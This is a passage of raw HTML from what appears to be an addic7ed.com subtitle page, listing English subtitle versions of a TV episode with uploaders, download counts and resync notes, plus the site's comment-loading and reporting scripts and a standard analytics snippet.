        <img src="http://www.addic7ed.com/images/download.png" width="24" height="24" /><a class="buttonDownload" href="/original/111620/21"><strong>Download</strong></a></td>
        <td><a href="/badsub.php?id=111620&amp;fversion=21&amp;lang=1"><img border='0' title='Report to moderators. Write a comment with your reason.' src='http://www.addic7ed.com//images/user_gray.png' width='24' height='24' /></a>
        </td>
      </tr>
      <tr>
        <td colspan="2" class="newsDate"><img title="Corrected" src="http://www.addic7ed.com/images/bullet_go.png" width="24" height="24" /><img title="Hearing Impaired" src="http://www.addic7ed.com/images/hi.jpg" width="24" height="24" />0 times edited · 1632 Downloads · 558 sequences
    </td>
        <td colspan="3"><img border="0" src="http://www.addic7ed.com/images/edit.png" width="24" height="24" /><a href="/list.php?id=111620&amp;fversion=21&amp;lang=1" onclick="return confirm('You are about to join View and Edit.\n Please use this feature for CORRECTING FILES only.\n IF you want to translate, click New Translation or Join translation instead')">view &amp; edit</a>&nbsp;</table>
        </td>
        <td>&nbsp;</td>
          </tr>
          <tr> <!-- table footer -->
        <td class="tablecorner"><img src="http://www.addic7ed.com/images/bl.gif" /></td>
        <td>&nbsp;</td>
        <td class="tablecorner"><img src="http://www.addic7ed.com/images/br.gif" /></td>
          </tr>
      </table>
        </div>
  <div id="container95m">
    <table class="tabel95">
      <tr> <!-- table header -->
      <td class="tablecorner"><img src="http://www.addic7ed.com/images/tl.gif" /></td>
      <td>&nbsp;</td>
      <td class="tablecorner"><img src="http://www.addic7ed.com/images/tr.gif" /></td>
        </tr>
        <tr>
      <td>&nbsp;</td>
      <td>
  <table width="100%" border="0" align="center" class="tabel95">
    <tr>
      <td colspan="3" align="center" class="NewsTitle"><img src="http://www.addic7ed.com/images/folder_page.png" width="16" height="16" />Version FLEET, 0.00 MBs&nbsp;<img title="720/1080" src="http://www.addic7ed.com/images/hdicon.png" width="24" height="24" /></td><td colspan="2">
      <img src="http://www.addic7ed.com/images/movie_faq.png" title="LOL &amp; SYS always work with 720p DIMENSION; XII & ASAP always work with 720p IMMERSE; 2HD always works with 720p 2HD; BiA always works with 720p BiA; FoV always works with 720p FoV" border="0" width="24" height="24" />
      <img src="http://www.addic7ed.com/images/subtitle.gif" width="22" height="14" /><a href="/starttranslation.php?id=111620&amp;fversion=1">New translation</a> <img src="http://www.addic7ed.com/images/link.png"  /> uploaded by <a href='/user/10641'>honeybunny</a>  7 days ago
        </td>
        <td width="16%">
        </td>
      </tr>
      <tr>
        <td colspan="4"></td>
        <td class="newsDate" colspan="3">
        <img src="http://www.addic7ed.com/images/invisible.gif" />
        </td>
      </tr><tr><td width="10%" rowspan="2" valign="top"><a href="http://addic7ed.com"><img height="35" width="100" src="http://www.addic7ed.com/friends/addic7ed.jpg" border="0" /></a>&nbsp;&nbsp;&nbsp;</td>
      <td width="1%" rowspan="2" valign="top"><img src="http://www.addic7ed.com/images/invisible.gif" />
      </td>
      <td width="21%" class="language">English<a href="javascript:saveFavorite(111620,1,0)"><img title="Start following..." src="http://www.addic7ed.com/images/icons/favorite.png" height="20" width="20" border="0" /></a>
      </td>
      <td width="19%"><b>Completed
        </b>
        </td>
        <td colspan="3">
        <img src="http://www.addic7ed.com/images/download.png" width="24" height="24" /> <a class="buttonDownload" href="/original/111620/1"><strong>original</strong></a>
        <a class="buttonDownload" href="/updated/1/111620/1"><strong>most updated</strong></a></td>
        <td><a href="/badsub.php?id=111620&amp;fversion=1&amp;lang=1"><img border='0' title='Report to moderators. Write a comment with your reason.' src='http://www.addic7ed.com//images/user_gray.png' width='24' height='24' /></a>
        </td>
      </tr>
      <tr>
        <td colspan="2" class="newsDate"><img title="Corrected" src="http://www.addic7ed.com/images/bullet_go.png" width="24" height="24" /><img src="http://www.addic7ed.com/images/icons/invisible.gif" width="24" height="24" />4 times edited · 11023 Downloads · 505 sequences
    </td>
        <td colspan="3"><img border="0" src="http://www.addic7ed.com/images/edit.png" width="24" height="24" /><a href="/list.php?id=111620&amp;fversion=1&amp;lang=1" onclick="return confirm('You are about to join View and Edit.\n Please use this feature for CORRECTING FILES only.\n IF you want to translate, click New Translation or Join translation instead')">view &amp; edit</a>&nbsp;edited  7 days ago
        </td>
      </tr></table>
        </td>
        <td>&nbsp;</td>
          </tr>
          <tr> <!-- table footer -->
        <td class="tablecorner"><img src="http://www.addic7ed.com/images/bl.gif" /></td>
        <td>&nbsp;</td>
        <td class="tablecorner"><img src="http://www.addic7ed.com/images/br.gif" /></td>
          </tr>
      </table>
        </div>
  <div id="container95m">
    <table class="tabel95">
      <tr> <!-- table header -->
      <td class="tablecorner"><img src="http://www.addic7ed.com/images/tl.gif" /></td>
      <td>&nbsp;</td>
      <td class="tablecorner"><img src="http://www.addic7ed.com/images/tr.gif" /></td>
        </tr>
        <tr>
      <td>&nbsp;</td>
      <td>
  <table width="100%" border="0" align="center" class="tabel95">
    <tr>
      <td colspan="3" align="center" class="NewsTitle"><img src="http://www.addic7ed.com/images/folder_page.png" width="16" height="16" />Version PROPER.BATV, 0.00 MBs&nbsp;<img title="720/1080" src="http://www.addic7ed.com/images/hdicon.png" width="24" height="24" /></td><td colspan="2">
      <img src="http://www.addic7ed.com/images/movie_faq.png" title="LOL &amp; SYS always work with 720p DIMENSION; XII & ASAP always work with 720p IMMERSE; 2HD always works with 720p 2HD; BiA always works with 720p BiA; FoV always works with 720p FoV" border="0" width="24" height="24" />
      <img src="http://www.addic7ed.com/images/subtitle.gif" width="22" height="14" /><a href="/starttranslation.php?id=111620&amp;fversion=2">New translation</a> <img src="http://www.addic7ed.com/images/link.png"  /> uploaded by <a href='/user/418387'>GoldenBeard</a>  7 days ago
        </td>
        <td width="16%">
        </td>
      </tr>
      <tr>
        <td colspan="4"></td>
        <td class="newsDate" colspan="3">
        resync of honeybunny's<img src="http://www.addic7ed.com/images/invisible.gif" />
        </td>
      </tr><tr><td width="10%" rowspan="2" valign="top">&nbsp;&nbsp;&nbsp;</td>
      <td width="1%" rowspan="2" valign="top"><img src="http://www.addic7ed.com/images/invisible.gif" />
      </td>
      <td width="21%" class="language">English<a href="javascript:saveFavorite(111620,1,0)"><img title="Start following..." src="http://www.addic7ed.com/images/icons/favorite.png" height="20" width="20" border="0" /></a>
      </td>
      <td width="19%"><b>Completed
        </b>
        </td>
        <td colspan="3">
        <img src="http://www.addic7ed.com/images/download.png" width="24" height="24" /><a class="buttonDownload" href="/original/111620/2"><strong>Download</strong></a></td>
        <td><a href="/badsub.php?id=111620&amp;fversion=2&amp;lang=1"><img border='0' title='Report to moderators. Write a comment with your reason.' src='http://www.addic7ed.com//images/user_gray.png' width='24' height='24' /></a>
        </td>
      </tr>
      <tr>
        <td colspan="2" class="newsDate"><img title="Corrected" src="http://www.addic7ed.com/images/bullet_go.png" width="24" height="24" /><img src="http://www.addic7ed.com/images/icons/invisible.gif" width="24" height="24" />0 times edited · 21408 Downloads · 482 sequences
    </td>
        <td colspan="3"><img border="0" src="http://www.addic7ed.com/images/edit.png" width="24" height="24" /><a href="/list.php?id=111620&amp;fversion=2&amp;lang=1" onclick="return confirm('You are about to join View and Edit.\n Please use this feature for CORRECTING FILES only.\n IF you want to translate, click New Translation or Join translation instead')">view &amp; edit</a>&nbsp;</table>
        </td>
        <td>&nbsp;</td>
          </tr>
          <tr> <!-- table footer -->
        <td class="tablecorner"><img src="http://www.addic7ed.com/images/bl.gif" /></td>
        <td>&nbsp;</td>
        <td class="tablecorner"><img src="http://www.addic7ed.com/images/br.gif" /></td>
          </tr>
      </table>
        </div>
  <div id="container95m">
    <table class="tabel95">
      <tr> <!-- table header -->
      <td class="tablecorner"><img src="http://www.addic7ed.com/images/tl.gif" /></td>
      <td>&nbsp;</td>
      <td class="tablecorner"><img src="http://www.addic7ed.com/images/tr.gif" /></td>
        </tr>
        <tr>
      <td>&nbsp;</td>
      <td>
  <table width="100%" border="0" align="center" class="tabel95">
    <tr>
      <td colspan="3" align="center" class="NewsTitle"><img src="http://www.addic7ed.com/images/folder_page.png" width="16" height="16" />Version WEB-DL, 1940.00 MBs&nbsp;<img title="720/1080" src="http://www.addic7ed.com/images/hdicon.png" width="24" height="24" /></td><td colspan="2">
      <img src="http://www.addic7ed.com/images/movie_faq.png" title="LOL &amp; SYS always work with 720p DIMENSION; XII & ASAP always work with 720p IMMERSE; 2HD always works with 720p 2HD; BiA always works with 720p BiA; FoV always works with 720p FoV" border="0" width="24" height="24" />
      <img src="http://www.addic7ed.com/images/subtitle.gif" width="22" height="14" /><a href="/starttranslation.php?id=111620&amp;fversion=20">New translation</a> <img src="http://www.addic7ed.com/images/link.png"  /> uploaded by <a href='/user/574350'>jaideejung007</a>  6 days ago
        </td>
        <td width="16%">
        </td>
      </tr>
      <tr>
        <td colspan="4"></td>
        <td class="newsDate" colspan="3">
        Resync of PROPER.BATV version | WORK WITH "WEB-DL-NTb" | ALL ADJUST NEW SEQUENCE TIME OF SUBTITLE<img src="http://www.addic7ed.com/images/invisible.gif" />
        </td>
      </tr><tr><td width="10%" rowspan="2" valign="top">&nbsp;&nbsp;&nbsp;</td>
      <td width="1%" rowspan="2" valign="top"><img src="http://www.addic7ed.com/images/invisible.gif" />
      </td>
      <td width="21%" class="language">English<a href="javascript:saveFavorite(111620,1,0)"><img title="Start following..." src="http://www.addic7ed.com/images/icons/favorite.png" height="20" width="20" border="0" /></a>
      </td>
      <td width="19%"><b>Completed
        </b>
        </td>
        <td colspan="3">
        <img src="http://www.addic7ed.com/images/download.png" width="24" height="24" /><a class="buttonDownload" href="/original/111620/20"><strong>Download</strong></a></td>
        <td><a href="/badsub.php?id=111620&amp;fversion=20&amp;lang=1"><img border='0' title='Report to moderators. Write a comment with your reason.' src='http://www.addic7ed.com//images/user_gray.png' width='24' height='24' /></a>
        </td>
      </tr>
      <tr>
        <td colspan="2" class="newsDate"><img title="Corrected" src="http://www.addic7ed.com/images/bullet_go.png" width="24" height="24" /><img src="http://www.addic7ed.com/images/icons/invisible.gif" width="24" height="24" />0 times edited · 1435 Downloads · 481 sequences
    </td>
        <td colspan="3"><img border="0" src="http://www.addic7ed.com/images/edit.png" width="24" height="24" /><a href="/list.php?id=111620&amp;fversion=20&amp;lang=1" onclick="return confirm('You are about to join View and Edit.\n Please use this feature for CORRECTING FILES only.\n IF you want to translate, click New Translation or Join translation instead')">view &amp; edit</a>&nbsp;</table>
        </td>
        <td>&nbsp;</td>
          </tr>
          <tr> <!-- table footer -->
        <td class="tablecorner"><img src="http://www.addic7ed.com/images/bl.gif" /></td>
        <td>&nbsp;</td>
        <td class="tablecorner"><img src="http://www.addic7ed.com/images/br.gif" /></td>
          </tr>
      </table>
        </div><div align="center">
          &nbsp;<form name="version" action="/newversion.php" method="post"><input type="submit" value="Upload a new version" class="coolBoton" /><input type="hidden" name="id" value="111620" />
        </form>
    </div><p>
    </p>
      <p>&nbsp;</p>
    <center>


    </center>
      <br />
      <div id="container95m">

        <table class="tabel95">
          <tr> <!-- table header -->
          <td class="tablecorner"><img src="http://www.addic7ed.com/images/tl.gif" /></td>
          <td>&nbsp;</td>
          <td class="tablecorner"><img src="http://www.addic7ed.com/images/tr.gif" /></td>
            </tr>
            <tr>
          <td>&nbsp;</td>
          <td>
            <span id="comments">
            </span>
          </td>
          <td>&nbsp;</td>
            </tr>
            <tr> <!-- table footer -->
          <td class="tablecorner"><img src="http://www.addic7ed.com/images/bl.gif" /></td>
          <td>&nbsp;</td>
          <td class="tablecorner"><img src="http://www.addic7ed.com/images/br.gif" /></td>
            </tr>
        </table>
          </div>


    <script type="text/javascript">
      function carga()
  {
var subID='111620';   $("comments").innerHTML = '<img src="http://www.addic7ed.com/images/loader.gif">';
    var myRequest = new Request({
        url: '/ajax_getComments.php',
        method: 'get',
        onSuccess: function(responseText){
      $("comments").innerHTML = responseText;
        }
    });
    myRequest.send('id='+subID);
  }

  function enviar()
  {
    var paramString = $("newc").toQueryString();
    $("comments").innerHTML = '<img src="http://www.addic7ed.com/images/loader.gif">';
                var myRequest = new Request({
                    url: '/ajax_getComments.php',
                    method: 'post',
                    onSuccess: function(responseText){
      $("comments").innerHTML = responseText;
                    }
                });
                myRequest.send(paramString);

    return false;
  }

  function notifyModerator(fversion, lang)
  {
var subID='111620';
    if (confirm('Are you sure that you want to report a problem to the moderators?'))
    {
      var myRequest = new Request({
          url: '/ajax_notify.php',
          method: 'get',
          onSuccess: function(responseText){
        alert("The notification has sent to the moderators. Please, be patient");
          }
      });
      myRequest.send('id='+subID+'&fversion='+fversion+'&lang='+lang);

      $("comments").innerHTML = '<img src="http://www.addic7ed.com/images/loader.gif">';
    }
  }


  function addCorrection(fversion, lang)
  {
var subID='111620';
    if (confirm('Are you sure you want to correct this subtitle??'))
    {
      var myRequest = new Request({
                            url: '/ajax_correction.php',
                            method: 'get',
                            onSuccess: function(responseText){
        alert("Subtitle added to Corrections page. Please correct it or announce that you bail");
                            }
                        });
                        myRequest.send('id='+subID+'&fversion='+fversion+'&lang='+lang);
    }
  }

  function delComment(cid)
  {
    var myRequest = new Request({
        url: '/ajax_delComment.php',
        method: 'get',
        onSuccess: function(responseText){
//      alert("Subtitle added to Corrections page. Please correct it or announce that you bail");
        }
    });
    myRequest.send('cid='+cid);

    $("comments").innerHTML = "<img src='http://www.addic7ed.com/images/loader.gif' />";

    var myRequest = new Request({
                    url: '/ajax_getComments.php',
                    method: 'get',
                    onSuccess: function(responseText){
          $("comments").innerHTML = responseText;
        }
                });
    myRequest.send('cid='+cid);
  }

  window.addEvent('domready', function(){ carga(); });
    </script>
    <center>

<center><table border="0" width="90%">
<tr>
<td class="NewsTitle"><img width="20" height="20" src="http://www.addic7ed.com/images/television.png" alt="TV" /><img src="http://www.addic7ed.com/images/invisible.gif" alt=" " />Addic7ed</td>
<td class="NewsTitle"><img width="20" height="20" src="http://www.addic7ed.com/images/television.png" alt="TV" /><img src="http://www.addic7ed.com/images/invisible.gif" alt=" " />Popular Shows</td>
<td class="NewsTitle"><img width="20" height="20" src="http://www.addic7ed.com/images/television.png" alt="TV" /><img src="http://www.addic7ed.com/images/invisible.gif" alt=" " />Useful</td>
<td class="NewsTitle"><img width="20" height="20" src="http://www.addic7ed.com/images/television.png" alt="TV" /><img src="http://www.addic7ed.com/images/invisible.gif" alt=" " />Forums</td>
</tr>
<tr>
<td><div id="footermenu"><a href="/shows.php">Browse By Shows</a></div></td>
<td><div id="footermenu"><a href="/show/4906">12 Monkeys</a></div></td>
<td><div id="footermenu"><a href="/shows-schedule">TV Shows Schedule</a></div></td>
<td><div id="footermenu"><a href="http://www.sub-talk.net/topic/1031-changelog/">Site Changelog</a></div></td>
</tr>
<tr>
<td><div id="footermenu"><a href="/movie-subtitles">Browse By Movies</a></div></td>
<td><div id="footermenu"><a href="/show/1812">Homeland</a></div></td>
<td><div id="footermenu"><a href="http://www.sub-talk.net/topic/2784-frequently-asked-questions/">Frequently Asked Questions</a></div></td>
<td><div id="footermenu">Support Us</div></td>
</tr>
<tr>
<td><div id="footermenu"><a href="/top-uploaders">Top Uploaders</a></div></td>
<td><div id="footermenu"><a href="/show/620">Modern Family</a></div></td>
<td><div id="footermenu">RSS Feeds</div></td>
<td><div id="footermenu">Premium Accounts</div></td>
</tr>
<tr>
<td><div id="footermenu"><a href="/log.php?mode=downloaded">Top Downloads</a></div></td>
<td><div id="footermenu"><a href="/show/466">Glee</a></div></td>
<td class="NewsTitle"><img width="20" height="20" src="http://www.addic7ed.com/images/television.png" alt="TV" /><img src="http://www.addic7ed.com/images/invisible.gif" alt=" "/>Tutorials</td>
<td><div id="footermenu"><a href="http://sub-talk.net/thread-6-1-1.html">Video Formats</a></div></td>
</tr>
<tr>
<td><div id="footermenu"><a href="/log.php?mode=news">All News</a></div></td>
<td><div id="footermenu"><a href="/show/450">Parks and Recreation</a></div></td>
<td><div id="footermenu"><a href="http://www.sub-talk.net/topic/338-guide-to-syncing-with-subtitleedit/page__p__1485__hl__%2B+%2Bsync__fromsearch__1#entry1485">How to Synchronize Subtitles</a></div></td>
<td><div id="footermenu">Frequently Asked Questions</div></td>
</tr>
<tr>
<td><div id="footermenu"><a href="http://www.sub-talk.net">Sub-Talk Forums</a></div></td>
<td><div id="footermenu"><a href="/show/1277">Shameless (US)</a></div></td>
<td><div id="footermenu">What Are Subtitles</div></td>
<td><div id="footermenu"><a href="http://sub-talk.net/index.php?gid=7">TV Shows Talk</a></div></td>
</tr>
<tr>
<td><div id="footermenu"><a href="/latest_comments.php">Latest Comments</a></div></td>
<td><div id="footermenu"><a href="/show/126">The Big Bang Theory</a></div></td>
<td><div id="footermenu">New Translation Tutorial</div></td>
<td><div id="footermenu"><a href="http://sub-talk.net/index.php?gid=22">Movies Talk</a></div></td>
</tr>
<tr>
<td><div id="footermenu"><a href="http://www.vreaubagaj.ro/troler/" title="Trolere ieftine" alt="Trolere ieftine">Trolere ieftine</a></div></td>
<td><div id="footermenu"><a href="/show/130">Family Guy</a></div></td>
<td><div id="footermenu">Upload a New Subtitle Tutorial</div></td>
<td class="NewsTitle"><img width="20" height="20" src="http://www.addic7ed.com/images/television.png" alt="TV" /><img src="http://www.addic7ed.com/images/invisible.gif" alt=" " />Stats</td>
</tr>
<tr>
<td><div id="footermenu">Terms of Service</div></td>
<td><div id="footermenu"><a href="/show/1799">American Horror Story</a></div></td>
<td><div id="footermenu"><a href="http://sub-talk.net/viewthread.php?tid=294">How to have an Avatar</a></div></td>
<td align="left">.
        </td>
</tr>
<tr>
<td><div id="footermenu"><a href="/contact.php">Contact</a></div></td>
<td><div id="footermenu"><a href="/show/15">House</a></div></td>
<td><div id="footermenu"><a href="http://www.vreaubagaj.ro/" alt="Trolere" title="Trolere">Trolere</a></div></td>
<td>
</td>
</tr>
</table></center>
</center>

<script type="text/javascript">
var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");
document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));
</script>
<script type="text/javascript">
try {
var pageTracker = _gat._getTracker("UA-10775680-1");
pageTracker._trackPageview();
} catch(err) {}</script>


<script type="text/javascript" src="http://apis.google.com/js/plusone.js"></script>

cached = build time: 0.14234709739685 <br>    </center>

    </body>
    </html>


